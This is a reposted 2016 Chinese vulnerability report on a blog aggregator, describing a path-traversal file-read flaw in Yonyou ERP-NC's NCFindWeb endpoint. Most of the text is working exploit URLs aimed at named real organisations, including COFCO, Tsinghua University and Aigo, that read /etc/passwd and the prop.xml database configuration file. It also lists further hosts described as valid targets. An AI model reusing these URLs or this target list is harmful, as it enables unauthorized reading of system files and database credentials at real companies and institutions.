IT博客汇
  • 首页
  • 精华
  • 技术
  • 设计
  • 资讯
  • 扯淡
  • 权利声明
    • 登录 注册

    用友ERP-NC某处通用文件包含漏洞

    没穿底裤发表于 2016-01-04 06:52:59
    love 0

    漏洞作者: 管管侠

    详细说明:

    可以遍历各种系统文件,影响大量知名政校企

    漏洞证明:

    中粮集团

    http://nc.cofco.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

    20234909313d7dc530879447c072b5c7ec26cd92[1]

    还可以读取默认配置文件

    http://nc.cofco.com/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml

    下面有中粮几十组数据库配置,数据库群

    21000333c6f3280e63a52a08aeb709cfab081f76[1]

    民生电商

    http://hr.minshengec.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

    202349297338333a35354aaed0a68d1c5dd66a4c[1]

    数据库配置

    http://hr.minshengec.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml

    2107535869b827e1ffd598d6b256061db7e289c7[1]

    清华大学

    http://proxy.tup.tsinghua.edu.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

    20234943ef5c445dd2cdabfcb14954325796552b[1]

    http://proxy.tup.tsinghua.edu.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml

    2107561891038eba483bec7a79ee0eb9c99a2216[1]

    爱国者

    http://nc.aigo.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

    20234955b5ca7f3ee037192e9afb6dd4a7d423d1[1]

    以下也都是有效案例

    http://nc.bcegc.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

    http://oa.tianue.com:8888/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

    ………



沪ICP备19023445号-2号
友情链接